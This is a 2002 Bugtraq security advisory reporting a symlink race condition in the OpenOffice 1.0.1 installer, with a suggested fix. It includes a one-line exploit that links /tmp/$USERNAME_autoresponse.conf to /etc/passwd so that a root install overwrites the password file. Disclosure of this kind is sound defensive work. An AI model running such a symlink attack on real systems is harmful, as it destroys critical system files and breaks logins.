[27396] in bugtraq
OpenOffice 1.0.1 Race condition during installation.
daemon@ATHENA.MIT.EDU (Larry W. Cashdollar)
Fri Oct 11 13:15:00 2002
Date: Fri, 11 Oct 2002 09:51:22 -0400 (EDT)
From: "Larry W. Cashdollar" <lwc@vapid.ath.cx>
To: <bugtraq@securityfocus.com>
Message-ID: <20021011094925.E1481-100000@vapid.ath.cx>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Vapid Labs
Larry W. Cashdollar
9/9/02
Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
system files.
Severity: Low
Description: A very simple and easy to exploit race condition exist during the
installation of OpenOffice. During this window a malicous user could create a
symlink in /tmp and overwrite arbitrary files.
Exploit:
As a normal user:
lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf
Where $USERNAME is the installer account name, probably root.
will result in the password file being over written with:
# create the proper autoresponse file
cat << EOF > /tmp/${USER}_autoresponse.conf
[ENVIRONMENT]
INSTALLATIONMODE=$installtype
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$prefix/$oo_home
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>
[JAVA]
JavaSupport=preinstalled_or_none
EOF
Fix:
Create a directory under /tmp to work from. With restrictive permissions.
References:
http://www.openoffice.org/dev_docs/source/1.0.1/index.html
Larry W. Cashdollar
lwc@vapid.ath.cx
http://vapid.ath.cx
